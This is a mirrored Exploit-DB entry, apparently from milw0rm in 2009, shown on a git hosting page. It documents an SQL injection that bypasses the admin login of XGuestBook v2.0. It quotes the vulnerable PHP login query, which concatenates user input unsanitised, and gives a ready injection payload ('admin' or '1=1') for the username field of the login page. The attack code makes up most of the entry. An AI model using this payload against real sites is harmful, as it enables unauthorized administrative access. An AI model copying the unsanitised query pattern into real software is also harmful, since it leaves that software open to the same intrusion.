bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/8101.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

37 lines
No EOL
862 B
Text
Raw Blame History

##########################################################################
Author = FireShot , Jacopo Vuga.
Mail = fireshot<at>autistici<dot>org
Vulnerability = SQL Admin Auth Bypass
Software = XGuestBook v2.0
Download =http://script.wareseeker.com/download/xguestbook.rar/14488
Greets to = Osirys, Myral, str0ke
###########################################################################
[CODE]
$user = $_POST['user'];
$pass = md5($_POST['pass']);
$result = mysql_query("SELECT * FROM xgb_user WHERE user='" . $user . "'
AND pass= '" . $pass . "'", $db_conn) or die (mysql_error());
[/CODE]
[EXPLOIT]
[URL] = http://www.site.com/login.php
you can inject SQL code in the USER space to bypass the admin login
[USER] = admin' or '1=1
[/EXPLOIT]
############################################################################
# milw0rm.com [2009-02-24]
Reference in a new issue View git blame Copy permalink